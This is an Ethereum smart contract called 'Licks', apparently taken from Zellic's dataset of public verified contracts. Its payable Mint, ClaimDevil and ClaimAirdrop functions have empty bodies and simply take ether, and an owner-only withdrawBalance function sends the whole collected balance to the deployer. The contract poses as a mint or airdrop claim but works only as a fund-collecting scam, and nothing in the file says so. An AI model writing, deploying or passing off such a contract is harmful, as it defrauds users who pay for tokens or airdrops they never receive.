zellic-audit
Initial commit
f998fcd
raw
history blame
1.06 kB
// This contract is part of Zellic’s smart contract dataset, which is a collection of publicly available contract code gathered as of March 2023.
/**
*Submitted for verification at Etherscan.io on 2022-12-29
*/
/**
*Submitted for verification at Etherscan.io on 2022-12-12
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;
contract Licks {
address private owner; // current owner of the contract
constructor(){
owner = msg.sender;
}
function getOwner(
) public view returns (address) {
return owner;
}
modifier onlyOwner() {
require(owner == msg.sender, "Ownable: caller is not the owner");
_;
}
function withdrawBalance() external onlyOwner{
(bool success, ) = msg.sender.call{value: address(this).balance}("");
require(success, "WITHDRAW FAILED!");
}
function Mint() public payable {
}
function ClaimDevil() public payable {
}
function ClaimAirdrop() public payable {
}
}